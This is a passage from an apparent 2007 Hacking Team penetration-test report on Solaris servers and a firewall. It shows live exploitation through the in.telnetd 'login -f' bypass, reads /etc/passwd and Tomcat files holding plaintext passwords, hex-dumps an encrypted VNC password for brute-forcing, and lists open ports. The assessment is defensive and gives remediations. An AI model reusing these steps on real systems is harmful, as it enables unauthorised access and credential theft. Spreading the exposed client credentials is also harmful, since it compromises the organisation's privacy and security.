nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
softsol:x:100:100:Softsolutions developers:/export/home/softsol:/usr/bin/bash
bash-3.00$
$ ./scan 192.168.254.183 bin
inet 192.168.254.183 netmask ffffff00 broadcast 192.168.254.255
ALEX ALEX
Trying 192.168.254.183...
Connected to 192.168.254.183.
Escape character is '^]'.
Last login: Wed Jul 18 18:12:21 from 100.100.200.87
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ bash
bash-3.00$ history
1 history
bash-3.00$ cd /opt/
bash-3.00$ find ./ | grep -i tomcat-users.xml
./tomcat-5.5.20/conf/tomcat-users.xml
./tomcat-5.5.17/conf/tomcat-users.xml
bash-3.00$ cat ./tomcat-5.5.20/conf/tomcat-users.xml
cat: cannot open ./tomcat-5.5.20/conf/tomcat-users.xml
bash-3.00$ cat ./tomcat-5.5.17/conf/tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="manager"/>
<user username="softsol" password="softsol" roles="manager"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 95 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
</tomcat-users>
bash-3.00$
bash-3.00$ ls -la ./tomcat-5.5.20/conf/tomcat-users.xml
-rw------- 1 softsol tomcat 440 Sep 12 2006 ./tomcat-
5.5.20/conf/tomcat-users.xml
$ ./scan 192.168.254.183 softsol
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.183...
Connected to 192.168.254.183.
Escape character is '^]'.
Last login: Tue Jul 17 09:50:20 from 10.35.239.129
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[softsol@mtsdfeedas4 ~]$ls
dfeedDownload log nohup.out opt script
[softsol@mtsdfeedas4 ~]$cd /opt/
[softsol@mtsdfeedas4 opt]$cat ./tomcat-5.5.20/conf/tomcat-users.xml
<!-- NOTE: By default, no user is included in the "manager" role required
to operate the "/manager" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary.
-->
<tomcat-users>
<user name="tomcat" password="tomcat" roles="tomcat" />
<user name="role1" password="tomcat" roles="role1" />
<user name="both" password="tomcat" roles="tomcat,role1" />
</tomcat-users>
[softsol@mtsdfeedas4 opt]$
bash-3.00$ /usr/bin/isainfo -kv
64-bit sparcv9 kernel modules
bash-3.00$ cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006
The host 192.168.254.185 has an outdated Solaris version, the supplied telnetd server calls login
with unescaped arguments allowing a remote user to login with any user, root and bin included,
without supplying a valid password:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 96 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
$ ./scan 192.168.254.185 bin
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.185...
Connected to 192.168.254.185.
Escape character is '^]'.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ w
6:33pm up 242 day(s), 14 min(s), 1 user, load average: 0.04, 0.04, 0.03
User tty login@ idle JCPU PCPU what
bin pts/5 6:33pm w
$ id
uid=2(bin) gid=2(bin)
$ uname -a
SunOS mtsvaddsas2 5.10 Generic_118833-17 sun4v sparc SUNW,Sun-Fire-T200
bash-3.00$ /sbin/ifconfig -a
lo0:3: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232
index 1
inet 127.0.0.1 netmask ff000000
ipge3:2: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 3
inet 192.168.254.185 netmask ffffff00 broadcast 192.168.254.255
bash-3.00$ cat /etc/passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
softsol:x:100:100:SoftSolutions! developers:/export/home/softsol:/usr/bin/bash
bash-3.00$
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 97 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
$ /usr/bin/isainfo -kv
64-bit sparcv9 kernel modules
$ cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006
6.3.7 192.168.254.142 [Compromised]
Rating: compromised
Vulnerabilities found: V5, V6
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates; disable the cleartext telnet/ftp services or replace them with
telnets/ssh/ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Netra T1 105
Hostname MILREPORTATS
Compromised Compromised Directly Info Telnet calling login -f
Auth -froot
The host was alive and these additional information could be extracted:
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.7+Sun/8.13.7
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.7+Sun/8.13.7
1521/tcp open oracle-tns Oracle TNS Listener
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 98 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
4045/tcp open nlockmgr 1-4 (rpc #100021)
5801/tcp open vnc-http AT&T VNC (User oracle; Resolution 1268x982; VNC TCP
port 5901)
5802/tcp open vnc-http AT&T VNC (User oracle; Resolution 1268x982; VNC TCP
port 5902)
5901/tcp open vnc VNC (protocol 3.3)
5902/tcp open vnc VNC (protocol 3.3)
6001/tcp open X11 (access denied)
6002/tcp open X11:2?
7100/tcp open font-service Sun Solaris fs.auto
32771/tcp open status 1 (rpc #100024)
32772/tcp open metad 1-2 (rpc #100229)
32773/tcp open mdcommd 1 (rpc #100422)
32774/tcp open rpc.metamedd 1 (rpc #100242)
32775/tcp open metamhd 1 (rpc #100230)
32776/tcp open rusersd 2-3 (rpc #100002)
32777/tcp open rpc
Uptime: 15.867 days (since Mon Jul 2 09:40:15 2007)
Network Distance: 2 hops
Service Info: Hosts: milreportats, milreportats.mtsgroup.org; OSs: Solaris, Unix
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
The host has an outdated Solaris version, the supplied telnetd server calls login with unescaped
arguments allowing a remote user to login with any user, root ,oracle and bin included, without
supplying a valid password. It's possible to read the encrypted VNC password which can be
bruteforced:
$ ./scan 192.168.254.142 bin
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.142...
Connected to 192.168.254.142.
Escape character is '^]'.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 99 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
$ uname -a
SunOS milreportats 5.10 Generic_118833-24 sun4u sparc SUNW,Sun-Fire-V240
$
$ w
4:23pm up 159 day(s), 3:58, 2 users, load average: 0.11, 0.13, 0.14
User tty login@ idle JCPU PCPU what
bin pts/4 4:22pm w
oracle pts/2 27Feb0742days 11:30 14 bash
oracle pts/5 9Mar0727days -ksh
oracle pts/6 Mon 6pm 30:36 1 -ksh
oracle pts/3 26Mar07 7days 15:13 bash
oracle pts/1 26Mar0720days ksh
oracle pts/7 6Jun07 7days 8 ksh
bash-3.00$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 Feb 09 ? 0:38 sched
root 1 0 0 Feb 09 ? 1:49 /sbin/init
root 2 0 0 Feb 09 ? 0:01 pageout
root 3 0 1 Feb 09 ? 1196:44 fsflush
root 339 7 0 Feb 09 ? 0:06 /usr/lib/saf/sac -t 300
root 7 1 0 Feb 09 ? 3:20 /lib/svc/bin/svc.startd
root 9 1 0 Feb 09 ? 13:50 /lib/svc/bin/svc.configd
daemon 120 1 0 Feb 09 ? 12:21 /usr/lib/crypto/kcfd
root 494 341 0 Feb 09 ? 0:00 /usr/sbin/rpc.metad
root 345 339 0 Feb 09 ? 0:06 /usr/lib/saf/ttymon
oracle 23163 5763 0 May 14 pts/3 0:01 bash
root 473 1 0 Feb 09 ? 3:00 /usr/lib/fm/fmd/fmd
root 130 1 0 Feb 09 ? 21:28 /usr/lib/picl/picld
oracle 21139 1 0 Feb 27 ? 17:24 Xvnc :1 -pn -desktop X -httpd
/usr/local/vnc/classes -auth /export/home/oracle/
daemon 331 1 0 Feb 09 ? 0:00 /usr/lib/nfs/statd
root 129 1 0 Feb 09 ? 0:00 devfsadmd
root 1979 7 0 Mar 16 console 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T sun -m ldterm,ttcompat -h
root 114 1 0 Feb 09 ? 0:00 /usr/lib/sysevent/syseventd
root 116 1 0 Feb 09 ? 12:08 /usr/sbin/nscd
root 133 1 0 Feb 09 ? 0:00 /usr/lib/power/powerd
root 341 1 0 Feb 09 ? 7:38 /usr/lib/inet/inetd start
root 225 1 0 Feb 09 ? 19:51 /usr/lib/inet/xntpd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 100 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
daemon 334 1 0 Feb 09 ? 0:00 /usr/lib/nfs/lockd
oracle 21330 1 0 Jul 17 ? 0:00 ora_q000_DWHA
root 324 1 0 Feb 09 ? 0:01 /usr/sbin/cron
daemon 328 1 0 Feb 09 ? 0:00 /usr/sbin/rpcbind
root 343 1 0 Feb 09 ? 0:42 /usr/lib/utmpd
root 554 1 0 Feb 09 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 449 1 0 Feb 09 ? 0:00 /usr/sbin/vold -f
/etc/vold.conf
root 427 1 0 Feb 09 ? 0:00 /usr/lib/autofs/automountd
root 429 427 0 Feb 09 ? 0:59 /usr/lib/autofs/automountd
oracle 26101 1 0 16:09:25 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 27335 1 0 May 29 ? 2:42 ora_psp0_TEST
root 456 1 0 Feb 09 ? 0:17 /usr/sbin/syslogd
root 458 1 0 Feb 09 ? 1:00 /usr/lib/ssh/sshd
root 471 1 0 Feb 09 ? 0:00 /usr/sbin/mdmonitord
root 557 554 0 Feb 09 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 556 554 0 Feb 09 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 531 1 0 Feb 09 ? 33:13 /opt/Navisphere/bin/naviagent
-f /etc/Navisphere/agent.config
oracle 21147 1 0 Feb 27 ? 0:00 ttsession -s -d
milreportats:1.0
root 19759 458 0 Jul 16 ? 0:03 /usr/lib/ssh/sshd
oracle 21149 21144 0 Feb 27 pts/2 0:00 -ksh
root 657 1 0 Feb 09 ? 0:00 /usr/lib/dmi/snmpXdmid -s
milreportats
root 623 1 0 Feb 09 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 705 1 0 Feb 09 ? 2:34 /usr/sfw/sbin/snmpd
root 653 1 0 Feb 09 ? 0:00 /usr/lib/dmi/dmispd
oracle 27467 1 0 May 29 ? 0:00 ora_q000_TEST
root 805 341 0 Feb 09 ? 0:00 /usr/dt/bin/rpc.ttdbserverd
root 642 1 0 Feb 09 ? 0:03 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
oracle 24579 1 0 07:50:02 ? 8:16 oracleDWHA (LOCAL=NO)
oracle 4571 28545 0 Jun 14 ? 0:00 /usr/dt/bin/dtexec -open 0
-ttprocid 1.15yNmN 01 28547 1289637087 1 1 100 192.1
oracle 21145 1 0 Feb 27 ? 8:16 /usr/dt/bin/dtwm
oracle 21322 1 0 Jul 17 ? 0:01 ora_qmnc_DWHA
oracle 21310 1 0 Jul 17 ? 0:00 ora_reco_DWHA
oracle 21304 1 0 Jul 17 ? 2:52 ora_lgwr_DWHA
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 101 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
oracle 21302 1 0 Jul 17 ? 0:24 ora_dbw0_DWHA
oracle 21308 1 0 Jul 17 ? 0:18 ora_smon_DWHA
oracle 21306 1 0 Jul 17 ? 0:37 ora_ckpt_DWHA
oracle 21298 1 0 Jul 17 ? 0:06 ora_psp0_DWHA
oracle 21296 1 0 Jul 17 ? 1:01 ora_pmon_DWHA
oracle 21300 1 0 Jul 17 ? 0:06 ora_mman_DWHA
oracle 25423 1 0 12:26:44 ? 0:02 oracleDWHA (LOCAL=NO)
oracle 25605 1 0 13:17:02 ? 0:02 oracleDWHA (LOCAL=NO)
oracle 25517 1 0 12:53:20 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 21165 21149 0 Feb 27 pts/2 0:00 bash
oracle 27357 1 0 May 29 ? 0:13 ora_s000_TEST
oracle 27351 1 0 May 29 ? 11:42 ora_mmon_TEST
oracle 21144 1 0 Feb 27 ?? 0:07 /usr/dt/bin/dtterm -geometry
80x24+10+10 -ls -title X Desktop
oracle 1112 1 0 Feb 09 ? 13:05
/opt/oracle/product/10.2.0/bin/tnslsnr LISTENER -inherit
oracle 5722 21165 0 Mar 26 pts/2 0:00 bash
oracle 25453 1 0 12:33:28 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 26047 1 0 15:54:25 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 5731 5730 0 Mar 26 pts/1 0:01 ksh
oracle 28549 28544 0 Mar 09 pts/5 0:00 -ksh
oracle 28547 1 0 Mar 09 ? 0:00 ttsession -s -d
milreportats:2.0
oracle 27333 1 0 May 29 ? 37:32 ora_pmon_TEST
oracle 5730 5722 0 Mar 26 pts/2 0:08 xterm -title milreportats:1
-fg darkblue
root 26136 341 0 16:22:53 ? 0:00 /usr/sbin/in.telnetd
oracle 25133 1 0 10:57:12 ? 0:01 oracleDWHA (LOCAL=NO)
oracle 26034 1 0 15:47:26 ? 0:01 oracleDWHA (LOCAL=NO)
oracle 24763 1 4 09:00:01 ? 84:25 oracleDWHA (LOCAL=NO)
root 2224 1 0 Feb 12 ? 6:56 /usr/lib/sendmail -bd -q15m
oracle 24949 1 0 10:03:28 ? 0:03 oracleDWHA (LOCAL=NO)
smmsp 2226 1 0 Feb 12 ? 0:23 /usr/lib/sendmail -Ac -q15m
oracle 28545 1 0 Mar 09 ? 8:33 /usr/dt/bin/dtwm
oracle 27341 1 0 May 29 ? 4:56 ora_lgwr_TEST
oracle 25435 1 0 12:29:49 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 27343 1 0 May 29 ? 38:18 ora_ckpt_TEST
oracle 25565 1 0 13:05:40 ? 0:02 oracleDWHA (LOCAL=NO)
oracle 5763 5762 0 Mar 26 pts/3 0:00 ksh
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 102 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
oracle 21312 1 0 Jul 17 ? 1:54 ora_cjq0_DWHA
oracle 21314 1 0 Jul 17 ? 0:11 ora_mmon_DWHA
oracle 25487 1 0 12:43:34 ? 0:01 oracleDWHA (LOCAL=NO)
oracle 27345 1 0 May 29 ? 6:07 ora_smon_TEST
oracle 21316 1 0 Jul 17 ? 2:14 ora_mmnl_DWHA
oracle 27347 1 0 May 29 ? 0:03 ora_reco_TEST
oracle 25463 1 0 12:35:30 ? 0:10 oracleDWHA (LOCAL=NO)
oracle 28544 1 0 Mar 09 ?? 0:02 /usr/dt/bin/dtterm -geometry
80x24+10+10 -ls -title X Desktop
oracle 27353 1 0 May 29 ? 69:43 ora_mmnl_TEST
oracle 28539 1 0 Mar 09 ? 82:08 Xvnc :2 -pn -desktop X -httpd
/usr/local/vnc/classes -auth /export/home/oracle/
oracle 19060 28549 0 Apr 03 pts/5 0:00 ssh mtsdwha
oracle 25923 1 0 15:12:18 ? 0:01 oracleDWHA (LOCAL=NO)
oracle 5762 5722 0 Mar 26 pts/2 0:05 xterm -title milreportats:2
-fg darkgreen
oracle 25425 1 0 12:26:45 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 27355 1 0 May 29 ? 0:07 ora_d000_TEST
oracle 15302 15301 0 Jun 06 pts/7 0:01 ksh
oracle 27339 1 0 May 29 ? 6:56 ora_dbw0_TEST
oracle 27461 1 0 May 29 ? 0:35 ora_qmnc_TEST
oracle 7239 28547 0 Jun 15 ? 0:00 /bin/sh -c dtfile -noview
oracle 15301 5722 0 Jun 06 pts/2 0:02 xterm -title milreportats:3
-fg darkred
oracle 26087 1 0 16:01:49 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 27349 1 0 May 29 ? 75:07 ora_cjq0_TEST
oracle 25579 1 0 13:09:14 ? 0:01 oracleDWHA (LOCAL=NO)
root 4577 341 0 Jun 14 ? 39:47
/usr/lib/netsvc/rstat/rpc.rstatd
oracle 27469 1 0 May 29 ? 0:24 ora_q001_TEST
oracle 7240 7239 0 Jun 15 ? 0:00 dtfile -noview
oracle 27337 1 0 May 29 ? 3:12 ora_mman_TEST
oracle 25465 1 0 12:35:30 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 24953 1 0 10:04:15 ? 0:01 oracleDWHA (LOCAL=NO)
root 24259 341 0 04:25:54 ? 0:00 /usr/sbin/rpc.metamedd
oracle 24989 1 0 10:09:48 ? 0:07 oracleDWHA (LOCAL=NO)
root 26135 458 0 16:22:53 ? 0:00 /usr/lib/ssh/sshd
oracle 25059 1 0 10:33:23 ? 0:01 oracleDWHA (LOCAL=NO)
oracle 25447 1 0 12:31:30 ? 0:07 oracleDWHA (LOCAL=NO)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 103 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
oracle 4572 4571 0 Jun 14 ? 28:32 sdtperfmeter -f -H -t cpu -t
disk -s 1 -name fpperfmeter
oracle 21332 1 0 Jul 17 ? 0:01 ora_q001_DWHA
oracle 24595 1 2 08:00:02 ? 8:13 oracleDWHA (LOCAL=NO)
root 24261 341 0 04:25:54 ? 0:00 /usr/sbin/rpc.metamhd
oracle 25449 1 0 12:31:30 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 25243 1 0 11:33:48 ? 0:02 oracleDWHA (LOCAL=NO)
oracle 19764 19762 0 Jul 16 pts/6 0:00 -ksh
oracle 19762 19759 0 Jul 16 ? 0:02 /usr/lib/ssh/sshd
bin 26161 26141 0 16:25:39 pts/4 0:00 bash
oracle 25575 1 0 13:06:54 ? 0:00 oracleDWHA (LOCAL=NO)
nobody 24255 341 0 04:25:54 ? 0:00 /usr/openwin/bin/xfs
oracle 25965 1 0 15:28:14 ? 0:00 oracleDWHA (LOCAL=NO)
bin 26141 26136 0 16:22:55 pts/4 0:00 -sh
oracle 25197 1 0 11:16:29 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 25433 1 0 12:29:48 ? 0:02 oracleDWHA (LOCAL=NO)
oracle 25249 1 0 11:35:05 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 25377 1 0 12:14:58 ? 0:00 oracleDWHA (LOCAL=NO)
oracle 25371 1 0 12:13:20 ? 0:05 oracleDWHA (LOCAL=NO)
bin 26162 26161 0 16:25:44 pts/4 0:00 ps -ef
TT_DB home lost+found oem10g
bash-3.00$ cd TT_DB/
bash-3.00$ ls
access_table.ind file_object_map.ind file_table.ind file_table.var
property_table.rec
access_table.rec file_object_map.rec file_table.rec
property_table.ind property_table.var
bash-3.00$ cd ..
bash-3.00$ ls
TT_DB home lost+found oem10g
bash-3.00$ cd oem10g/
bash-3.00$ ls
dcommon doc index.htm install libskgxn oms
rdbms response runInstaller stage
bash-3.00$ cd ..
bash-3.00$ ls
TT_DB home lost+found oem10g
bash-3.00$ cd home/
bash-3.00$ ls
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 104 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
oracle
bash-3.00$ cd oracle/
bash-3.00$ ls
Mail backup data import_BV
load_swap_tables script.sql time_weighted.sql vito.csv
OracleHomes bondindex dump kit logs
static_data_input timeseries
apt check_scripts export_BV load_data.sql
oraInventory temp util
bash-3.00$
bash-3.00$ cat /etc/passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
oracle:x:100:100::/export/home/oracle:/usr/bin/ksh
$ ./scan 192.168.254.142 oracle
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 192.168.254.142...
Connected to 192.168.254.142.
Escape character is '^]'.
Last login: Tue Jul 17 09:39:06 from mnovik.mtsgroup
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have mail.
oracle@milreportats&DWHA:/export/home/oracle>ls
Mail backup data import_BV
load_swap_tables script.sql time_weighted.sql vito.csv
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 105 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
OracleHomes bondindex dump kit logs
static_data_input timeseries
apt check_scripts export_BV load_data.sql
oraInventory temp util
oracle@milreportats&DWHA:/export/home/oracle>
bash-3.00$ id
uid=1(daemon) gid=1(other)
bash-3.00$ prtconf -D|grep net
network, instance #0 (driver name: bge)
network, instance #1 (driver name: bge)
network, instance #2 (driver name: bge)
network, instance #3 (driver name: bge)
bash-3.00$ uname -a
SunOS milreportats 5.10 Generic_118833-24 sun4u sparc SUNW,Sun-Fire-V240
bash-3.00$ hostname
milreportats
bash-3.00$ /sbin/ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index
1
inet 127.0.0.1 netmask ff000000
bge0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
inet 192.168.254.142 netmask ffffff00 broadcast 192.168.254.255
bash-3.00$ ls -la
total 1258
drwxr-xr-x 2 oracle dba 512 Mar 9 16:24 .
drwxr-xr-x 29 oracle dba 1024 Jul 17 09:39 ..
-rw-r--r-- 1 oracle dba 485 Feb 9 10:27 config
-rw-r--r-- 1 oracle dba 170752 Jul 19 18:47 milreportats:1.log
-rw-r--r-- 1 oracle dba 6 Feb 27 11:38 milreportats:1.pid
-rw-r--r-- 1 oracle dba 432907 Jul 19 05:11 milreportats:2.log
-rw-r--r-- 1 oracle dba 6 Mar 9 16:24 milreportats:2.pid
-rw------- 1 oracle dba 8 Feb 9 10:16 passwd
-rwxr-xr-x 1 oracle dba 13355 Feb 27 11:37 vncserver
-rwxr-xr-x 1 oracle dba 172 Feb 22 16:09 xstartup
bash-3.00$ pwd
/export/home/oracle/.vnc
bash-3.00$
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 106 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
perl -e '$f="passwd";open(FILE,$f);binmode
FILE;while(read(FILE,$b,16)){printf("%08x:%s\n",$a,hexstr($);$a +=
16;};close(FILE);sub hexstr{my @list = unpack("H32",$_[0]);my $result =
sprintf("%-32s",$list[0]);my $expanded;while ( $result =~ /(..)/g )
{$expanded.=$1." ";}return $expanded;}'
00000000:c5 5c 88 b4 62 93 39 02
oracle@milreportats&DWHA:/export/home/oracle/.vnc>/usr/bin/isainfo -kv
64-bit sparcv9 kernel modules
oracle@milreportats&DWHA:/export/home/oracle/.vnc>cat /etc/release
Solaris 10 6/06 s10s_u2wos_09a SPARC
Copyright 2006 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 09 June 2006
6.3.8 192.168.254.1 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates, especially TCP/IP stack related ones
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS Checkpoint Version FireWall-1
Hostname mtsh-fw1
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 3.1p1 (protocol 2.0)
256/tcp open fw1-topology Checkpoint FW1 Topology
257/tcp open fw1-log Checkpoint Firewall1 logging service
259/tcp open telnet Check Point FireWall-1 Client Authenticaton Server
262/tcp open tcpwrapped
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 107 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
264/tcp open fw1-topo Checkpoint FW-1 Topology download
443/tcp open ssl/http Apache httpd
500/tcp open isakmp?
900/tcp open http Check Point Firewall-1 Client Authentication httpd
1029/tcp open ms-lsa?
1030/tcp open iad1?
1031/tcp open iad2?
1032/tcp open iad3?
1033/tcp open fw1-rlogin Check Point FireWall-1 authenticated RLogin server
(mtsh-fw1)
18183/tcp open fw1-topo Checkpoint FW-1 Topology download
18184/tcp open fw1-topo Checkpoint FW-1 Topology download
18187/tcp open fw1-topo Checkpoint FW-1 Topology download
Uptime: 189.214 days (since Tue Jan 9 23:14:54 2007)
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: Device: firewall
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.3.9 192.168.254.6 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Medium
Solution: Install all vendor updates; disable finger service
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version Sun StorEdge T300
Hostname MTSDWHA
Compromi
sed
No Info None
Auth Not detected
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 108 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.13.6+Sun/8.13.6
665/tcp open unknown
